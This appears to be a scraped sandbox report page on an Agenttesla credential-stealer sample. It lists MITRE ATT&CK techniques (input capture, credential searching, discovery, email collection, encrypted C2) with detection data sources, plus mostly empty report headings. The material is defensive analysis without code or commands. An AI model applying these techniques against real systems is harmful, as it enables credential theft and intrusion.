Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report caraganas.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

Function 0040C11A, Relevance: 299.5, APIs: 159, Strings: 11, Instructions: 2033
COMMON

Function 00401394, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 00403037, Relevance: 1.6, APIs: 1, Instructions: 325
COMMON

Function 0040BBD4, Relevance: 72.3, APIs: 48, Instructions: 326
COMMON

Function 0040E625, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 110
COMMON

Function 0040E55A, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 52
COMMON

Function 0040AE53, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 98
COMMON

Function 0040E8D8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre